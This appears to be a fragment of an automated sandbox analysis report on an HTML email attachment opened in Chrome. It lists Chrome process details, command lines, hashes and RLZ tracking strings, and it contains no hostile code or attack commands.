                                                                                                                                                                                    Data Ascii: rlzC1: 1C1ONGR_enUS1094rlzC2: 1C2ONGR_enUS1094rlzC7: 1C7ONGR_enUS1094dcc: set_dcc: C1:1C1ONGR_enUS1094,C2:1C2ONGR_enUS1094,C7:1C7ONGR_enUS1094events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: d69db258


                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:14:41:21
                                                                                                                                                                                    Start date:26/01/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT00001.html
                                                                                                                                                                                    Imagebase:0x7ff71e7f0000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:14:41:21
                                                                                                                                                                                    Start date:26/01/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2040,i,1513467722100339984,2560911328542590446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff71e7f0000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    No disassembly